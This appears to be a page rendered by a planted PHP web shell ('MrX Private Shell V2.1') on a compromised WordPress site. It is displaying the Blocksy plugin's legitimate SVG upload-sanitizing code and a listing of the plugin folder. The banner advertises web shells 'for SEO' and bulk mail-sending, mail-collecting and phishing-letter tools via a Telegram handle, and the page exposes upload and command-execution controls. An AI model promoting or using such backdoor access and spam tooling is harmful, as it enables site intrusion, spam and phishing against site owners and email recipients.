__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace Blocksy;

class SvgHandling {
	public function __construct() {
		add_filter(
			'wp_handle_upload_prefilter',
			function ($file) {
				$extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));

				if ('svg' !== $extension) {
					return $file;
				}

				if (! apply_filters('blocksy:svg:should_sanitize', true)) {
					return $file;
				}

				$svg_content = file_get_contents($file['tmp_name']);

				$trimmed_content = trim($svg_content);

				if (
					strpos($trimmed_content, '<?xml') !== 0
					&&
					strpos($trimmed_content, '<svg') !== 0
				) {
					$file['error'] = __('This file does not appear to be a valid SVG file.', 'blocksy-companion');
					return $file;
				}

				if (
					stripos($svg_content, '<?php') !== false
					||
					stripos($svg_content, '<?=') !== false
				) {
					$file['error'] = __('SVG files cannot contain PHP code.', 'blocksy-companion');
					return $file;
				}

				$sanitized_content = $this->cleanup_svg($svg_content);

				file_put_contents($file['tmp_name'], $sanitized_content);

				return $file;
			}
		);

		add_filter(
			'wp_get_attachment_metadata',
			[$this, 'filter_get_attachment_metadata'],
			10, 2
		);

		add_filter(
			'wp_update_attachment_metadata',
			[$this, 'filter_get_attachment_metadata'],
			10, 2
		);

		add_filter(
			'wp_get_attachment_image_src',
			function ($image, $attachment_id, $size, $icon) {
				if (! isset($attachment_id)) {
					return $image;
				}

				$mime = get_post_mime_type($attachment_id);

				if (
					'image/svg+xml' === $mime
					&&
					$image[1] === 1
					&&
					$image[2] === 1
				) {
					$dimensions = $this->get_dimensions_for($attachment_id);

					$image[2] = $dimensions['height'];
					$image[1] = $dimensions['width'];
				}

				return $image;
			},
			10, 4
		);

		$should_add_filter = true;

		// Avoid adding the filter during image cropping to prevent issues with SVGs.
		// WP can't locate editor for SVGs so it throws an error.
		if (
			// phpcs:ignore WordPress.Security.NonceVerification.Recommended
			isset($_REQUEST['action'])
			&&
			// phpcs:ignore WordPress.Security.NonceVerification.Recommended
			$_REQUEST['action'] === 'crop-image'
		) {
			$should_add_filter = false;
		}

		if ($should_add_filter) {
			add_filter('upload_mimes', [$this, 'upload_mimes']);
			add_filter('wp_check_filetype_and_ext', [$this, 'wp_check_filetype_and_ext'], 75, 4);
		}
	}

	public function wp_check_filetype_and_ext($data = null, $file = null, $filename = null, $mimes = null) {
		$extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));

		// Only accept files with .svg as the final extension
		// Reject files like test.svg.php, test.svg.jpg, etc.
		if ($extension === 'svg') {
			$data['type'] = 'image/svg+xml';
			$data['ext'] = 'svg';
		}

		return $data;
	}

	public function upload_mimes($mimes) {
		$mimes['svg'] = 'image/svg+xml';
		return $mimes;
	}

	public function filter_get_attachment_metadata($data, $attachment_id) {
		$mime = get_post_mime_type($attachment_id);

		if (
			'image/svg+xml' === $mime
			&&
			is_array($data)
			&&
			(
				! isset($data['width'])
				||
				! isset($data['height'])
			)
		) {
			$dimensions = $this->get_dimensions_for($attachment_id);

			$data['width'] = $dimensions['width'];
			$data['height'] = $dimensions['height'];
		}

		return $data;
	}

	public function get_dimensions_for($attachment_id) {
		$height = 100;
		$width = 100;

		$maybe_file = get_attached_file($attachment_id);

		if ($maybe_file) {
			$dimensions = $this->svg_dimensions($maybe_file);

			if ($dimensions) {
				$height = round($dimensions['height']);
				$width = round($dimensions['width']);
			}
		}

		return [
			'height' => $height,
			'width' => $width
		];
	}

	public function svg_dimensions($svg) {
		if (
			! preg_match('/.svg$/', $svg)
			||
			! file_exists($svg)
		) {
			return null;
		}

		$svg = file_get_contents($svg);

		$attributes = new \stdClass();

		if ($svg && function_exists('simplexml_load_string')) {
			$svg = @simplexml_load_string($svg);

			if ($svg) {
				foreach ($svg->attributes() as $key => $value) {
					$attributes->{$key} = strval($value);
				}
			}
		}

		if (
			! isset($attributes->width)
			&&
			$svg
			&&
			function_exists('xml_parser_create')
		) {
			$xml = xml_parser_create('UTF-8');

			$svgData = new \stdClass();

			xml_parser_set_option($xml, XML_OPTION_CASE_FOLDING, false);
			xml_set_element_handler(
				$xml,
				function ($parser, $name, $attrs) use (&$svgData) {
					if ($name === 'SVG') {
						if (isset($attrs['WIDTH'])) {
							$attrs['width'] = $attrs['WIDTH'];
						}

						if (isset($attrs['HEIGHT'])) {
							$attrs['height'] = $attrs['HEIGHT'];
						}

						if (isset($attrs['VIEWBOX'])) {
							$attrs['viewBox'] = $attrs['VIEWBOX'];
						}

						foreach ($attrs as $key => $value) {
							$svgData->{$key} = $value;
						}
					}
				},
				function ($parser, $tag) {
				}
			);

			if (xml_parse($xml, $svg, true)) {
				$attributes = $svgData;
			}

			xml_parser_free($xml);
		}

		$width = 0;
		$height = 0;

		if (empty($attributes)) {
			return false;
		}

		if (
			isset($attributes->width, $attributes->height)
			&&
			is_numeric($attributes->width)
			&&
			is_numeric($attributes->height)
		) {
			$width = floatval($attributes->width);
			$height = floatval($attributes->height);
		} elseif (isset($attributes->viewBox)) {
			$sizes = explode(' ', $attributes->viewBox);

			if (isset($sizes[2], $sizes[3])) {
				$width = floatval($sizes[2]);
				$height = floatval($sizes[3]);
			}
		} else {
			return false;
		}

		return [
			'width' => $width,
			'height' => $height,
			'orientation' => ($width > $height) ? 'landscape' : 'portrait'
		];
	}

	public function cleanup_svg($content) {
		$base_path = BLOCKSY_PATH . 'vendor/svg-sanitizer/src';

		require_once($base_path . '/data/AttributeInterface.php');
		require_once($base_path . '/data/TagInterface.php');
		require_once($base_path . '/data/AllowedAttributes.php');
		require_once($base_path . '/data/AllowedTags.php');
		require_once($base_path . '/data/XPath.php');
		require_once($base_path . '/ElementReference/Resolver.php');
		require_once($base_path . '/ElementReference/Subject.php');
		require_once($base_path . '/ElementReference/Usage.php');
		require_once($base_path . '/Exceptions/NestingException.php');
		require_once($base_path . '/Helper.php');
		require_once($base_path . '/Sanitizer.php');

		$sanitizer = new \blocksy\enshrined\svgSanitize\Sanitizer();

		// Remove <?xml tag from the SVG content to avoid html5
		// validation issues when embedding SVGs inline.
		$sanitizer->removeXMLTag(true);

		return $sanitizer->sanitize($content);
	}
}


Filemanager

Name Type Size Permission Actions
blocks Folder 0775
conditions Folder 0775
demo-install Folder 0775
header Folder 0775
account-auth.php File 8.31 KB 0775
conditions-manager.php File 8.8 KB 0775
customizer-options-manager.php File 5.6 KB 0775
demo-install.php File 6.93 KB 0775
dynamic-css.php File 6.06 KB 0775
google-analytics.php File 2.4 KB 0775
header.php File 14.47 KB 0775
inline-styles-collector.php File 3.21 KB 0775
opengraph-meta-data.php File 6.38 KB 0775
svg.php File 6.57 KB 0775
Filemanager